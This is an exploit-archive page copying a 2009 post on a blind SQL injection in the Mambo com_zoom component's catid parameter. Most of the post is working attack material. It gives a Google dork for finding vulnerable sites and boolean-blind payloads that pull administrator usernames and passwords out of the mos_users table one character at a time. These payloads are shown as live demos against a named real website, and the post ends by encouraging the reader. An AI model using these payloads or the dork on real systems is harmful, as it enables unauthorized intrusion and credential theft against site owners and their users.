Advertisement






Mambo component com_zoom (catid) Blind SQL injection

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2009-09-11
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2009090012

Below is a copy:

  Mambo component com_zoom (catid) Blind SQL injection 

      Red n'black i dress eagle on my chest. 
      It's good to be an ALBANIAN Keep my head up high for that flag i die. 
      Im proud to be an ALBANIAN
   ######    
              
       Author         : boom3rang
       Contact        : boom3rang[at]live.com                          
       Greetz   : H!tm@N - KHG - cHs

  R.I.P redc00de          
   -------------------------------------------------------------------    
              
                  Affected software description                      
             <name>zoom</name>
             <creationDate>20/01/2004</creationDate>
             <author>Mike de Boer</author>
             <authorEmail>[email protected]</authorEmail>
             <authorUrl>www.mikedeboer.nl</authorUrl>
             <version>2.0</version>          
   -------------------------------------------------------------------    
              
    [~] SQLi :                  
              
    http://www.TARGET.com/index.php?option=com_zoom&Itemid=0&catid=[SQLi]           
                                                                 
    [~]Google Dork :                     
    
    inurl:com_zoom inurl:"imgid"    
              
   -------------------------------------------------------------------    
              
    [~] Table_NAME  =  mos_users
    [~] Column_NAME =  username - password                             
   -------------------------------------------------------------------    
              
    [~] Admin Path :                  
              
    http://www.TARGET.com/administrator

   ===                          = POC =
   ===

        
    [~] Live Demo:
    ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/*    --> True
   ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/*    --> False

   -------------------------------------------------------------------

    [~] ASCII 
   index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96

   -------------------------------------------------------------------
    
    [~] Live Demo ASCII

      True
   http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96
      
      False
   http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>97

   Like we see, the first charter of username is 'a'char(97)=a
   Now you can change the second limit to find other charters, Good Luck...

note:
<name>zoom</name>
<creationDate>20/01/2004</creationDate>
<author>Mike de Boer</author>
<authorEmail>[email protected]</authorEmail>
<authorUrl>www.mikedeboer.nl</authorUrl>
<version>2.0</version>




Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.